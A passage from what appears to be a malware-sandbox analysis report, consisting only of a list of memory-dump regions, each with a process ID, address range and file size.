                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/5408-211-0x00000185E0EF0000-0x00000185E0F00000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/5408-212-0x00000185E0EF0000-0x00000185E0F00000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/5420-70-0x00007FF9B4910000-0x00007FF9B53D1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/5420-88-0x0000000002CA0000-0x0000000002CB0000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/5420-267-0x00007FF9B4910000-0x00007FF9B53D1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/5420-71-0x0000000000280000-0x0000000000A18000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          7.6MB

                                                                                                                        • memory/5604-72-0x0000020E22940000-0x0000020E22962000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          136KB

                                                                                                                        • memory/5604-73-0x00007FF9B4910000-0x00007FF9B53D1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/5604-74-0x0000020E3AFA0000-0x0000020E3AFB0000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/5604-80-0x0000020E3AFA0000-0x0000020E3AFB0000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/5604-87-0x00007FF9B4910000-0x00007FF9B53D1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/5824-108-0x0000023E46310000-0x0000023E46320000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/5824-96-0x0000023E46310000-0x0000023E46320000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/5824-95-0x00007FF9B4910000-0x00007FF9B53D1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/5824-102-0x0000023E46310000-0x0000023E46320000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/5824-186-0x00007FF9B4910000-0x00007FF9B53D1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/5852-409-0x000001DA1DE20000-0x000001DA1DE30000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/5852-459-0x00007FF9B4910000-0x00007FF9B53D1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/5852-455-0x000001DA058A0000-0x000001DA058A8000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          32KB

                                                                                                                        • memory/5852-416-0x00007FF9B4910000-0x00007FF9B53D1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/5904-395-0x00007FF9B4910000-0x00007FF9B53D1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/5904-467-0x00007FF9B4910000-0x00007FF9B53D1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/5904-396-0x000001BDA3E60000-0x000001BDA3E70000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/6064-297-0x00007FF9C8C60000-0x00007FF9C8C8D000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          180KB

                                                                                                                        • memory/6064-410-0x00007FF9C8C90000-0x00007FF9C8CB4000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          144KB

                                                                                                                        • memory/6064-332-0x00007FF9B92E0000-0x00007FF9B98D0000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          5.9MB

                                                                                                                        • memory/6064-308-0x00007FF9C8950000-0x00007FF9C8969000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          100KB

                                                                                                                        • memory/6064-303-0x00007FF9B9160000-0x00007FF9B92D6000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          1.5MB

                                                                                                                        • memory/6064-321-0x00000236471D0000-0x00000236476F9000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          5.2MB

                                                                                                                        • memory/6064-315-0x00007FF9B8C30000-0x00007FF9B9159000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          5.2MB

                                                                                                                        • memory/6064-273-0x00007FF9C8C90000-0x00007FF9C8CB4000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          144KB

                                                                                                                        • memory/6064-307-0x00007FF9C8C30000-0x00007FF9C8C3D000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          52KB

                                                                                                                        • memory/6064-326-0x00007FF9C8920000-0x00007FF9C892D000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          52KB

                                                                                                                        • memory/6064-302-0x00007FF9C8970000-0x00007FF9C8993000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          140KB

                                                                                                                        • memory/6064-312-0x00007FF9C8430000-0x00007FF9C8463000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          204KB

                                                                                                                        • memory/6064-322-0x00007FF9B89A0000-0x00007FF9B8ABC000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          1.1MB

                                                                                                                        • memory/6064-301-0x00007FF9C8C40000-0x00007FF9C8C59000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          100KB

                                                                                                                        • memory/6064-324-0x00007FF9C8360000-0x00007FF9C842D000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          820KB

                                                                                                                        • memory/6064-325-0x00007FF9C8930000-0x00007FF9C8944000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          80KB

                                                                                                                        • memory/6064-291-0x00007FF9CBD30000-0x00007FF9CBD3F000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          60KB

                                                                                                                        • memory/6064-268-0x00007FF9B92E0000-0x00007FF9B98D0000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          5.9MB

                                                                                                                        • memory/6084-432-0x00007FF9B4910000-0x00007FF9B53D1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/6084-398-0x000001ACCBB30000-0x000001ACCBB40000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/6084-399-0x000001ACCBB30000-0x000001ACCBB40000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/6084-397-0x00007FF9B4910000-0x00007FF9B53D1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB